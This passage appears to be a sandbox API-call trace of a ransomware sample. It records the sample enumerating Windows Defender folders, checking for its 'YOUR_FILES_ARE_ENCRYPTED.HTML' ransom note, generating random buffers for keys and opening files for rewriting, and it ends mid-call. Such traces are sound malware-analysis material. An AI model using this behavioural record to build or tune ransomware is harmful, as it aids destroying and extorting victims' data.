ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf900c0a9, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0xcfdc43, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80", cAlternateFileName="MPCACH~1.80")) returned 1 [0110.382] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.382] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80") returned 111 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80") returned=".80" [0110.382] lstrlenW (lpString=".80") returned 3 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80") returned=".80" [0110.382] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x820, ftCreationTime.dwLowDateTime=0xf907e70d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf907e70d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf907e70d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x1d7f38, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83", cAlternateFileName="MPCACH~1.83")) returned 1 [0110.382] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.382] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83") returned 111 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83") returned=".83" [0110.382] lstrlenW (lpString=".83") returned 3 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83") returned=".83" [0110.382] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf900c0a9, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf900c0a9, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf900c0a9, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x1a3a61, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87", cAlternateFileName="MPCACH~1.87")) returned 1 [0110.382] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.382] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87") returned 111 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87") returned=".87" [0110.382] lstrlenW (lpString=".87") returned 3 [0110.382] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87") returned=".87" [0110.382] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf90582ee, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf90582ee, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf907e70d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x358f2f, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0", cAlternateFileName="MPCACH~1.A0")) returned 1 [0110.383] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.383] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0") returned 111 [0110.383] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0") returned=".A0" [0110.383] lstrlenW (lpString=".A0") returned 3 [0110.383] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0") returned=".A0" [0110.383] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf907e70d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf907e70d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf907e70d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x5fff9, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB", cAlternateFileName="MPCACH~1.CB")) returned 1 [0110.383] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.383] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB") returned 111 [0110.383] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB") returned=".CB" [0110.383] lstrlenW (lpString=".CB") returned 3 [0110.383] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB") returned=".CB" [0110.383] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf907e70d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf907e70d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf907e70d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x441a1, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC", cAlternateFileName="MPCACH~1.CC")) returned 1 [0110.383] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.383] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC") returned 111 [0110.383] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC") returned=".CC" [0110.383] lstrlenW (lpString=".CC") returned 3 [0110.383] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC") returned=".CC" [0110.383] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x63bd6e5a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x70, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="MpDiag.bin", cAlternateFileName="")) returned 1 [0110.383] StrStrIW (lpFirst="MpDiag.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.383] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MpDiag.bin") returned 66 [0110.383] PathFindExtensionW (pszPath="MpDiag.bin") returned=".bin" [0110.383] lstrlenW (lpString=".bin") returned 4 [0110.383] PathFindExtensionW (pszPath="MpDiag.bin") returned=".bin" [0110.383] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\MpDiag.bin" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\mpdiag.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.383] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=112) returned 1 [0110.383] CloseHandle (hObject=0x30c) returned 1 [0110.384] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="RtSigs", cAlternateFileName="")) returned 1 [0110.384] StrStrIW (lpFirst="RtSigs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.384] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs") returned 62 [0110.384] GetProcessHeap () returned 0x600000 [0110.384] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.384] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs" [0110.385] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\*" [0110.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4f6a79, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0110.385] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4f6a79, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.385] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="Data", cAlternateFileName="")) returned 1 [0110.385] StrStrIW (lpFirst="Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.385] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data") returned 67 [0110.385] GetProcessHeap () returned 0x600000 [0110.385] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.386] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data" [0110.386] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\*" [0110.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4ebbd4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.386] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf4ebbd4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0110.386] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4ebbd4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4ebbd4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4f0a78, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.386] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4ebbd4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4ebbd4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4f0a78, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.386] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.386] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0110.386] GetProcessHeap () returned 0x600000 [0110.386] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\rtsigs\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.387] GetProcessHeap () returned 0x600000 [0110.387] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.387] GetProcessHeap () returned 0x600000 [0110.387] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.387] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4f6a79, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4f6a79, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4fa5a7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.387] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4f6a79, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4f6a79, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf4fa5a7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.388] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0110.388] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0110.388] GetProcessHeap () returned 0x600000 [0110.388] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\RtSigs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\rtsigs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.388] GetProcessHeap () returned 0x600000 [0110.388] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.388] GetProcessHeap () returned 0x600000 [0110.388] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.389] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4ff389, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4ff389, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf504145, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.389] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf4ff389, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf4ff389, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf504145, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.389] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0110.389] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0110.389] GetProcessHeap () returned 0x600000 [0110.389] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.390] GetProcessHeap () returned 0x600000 [0110.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.390] GetProcessHeap () returned 0x600000 [0110.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.390] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf66c7aa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf66c7aa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Support", cAlternateFileName="")) returned 1 [0110.391] StrStrIW (lpFirst="Support", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.391] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned 57 [0110.391] GetProcessHeap () returned 0x600000 [0110.391] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.391] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support" [0110.391] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*" [0110.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf66c7aa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf66c7aa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0110.392] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf66c7aa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf66c7aa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.392] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd04c5003, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd04c5003, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x8436108b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x144, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="MPDetection-02112021-121950.log", cAlternateFileName="MPDETE~1.LOG")) returned 1 [0110.392] StrStrIW (lpFirst="MPDetection-02112021-121950.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.392] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\MPDetection-02112021-121950.log") returned 89 [0110.392] PathFindExtensionW (pszPath="MPDetection-02112021-121950.log") returned=".log" [0110.392] lstrlenW (lpString=".log") returned 4 [0110.392] PathFindExtensionW (pszPath="MPDetection-02112021-121950.log") returned=".log" [0110.392] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: 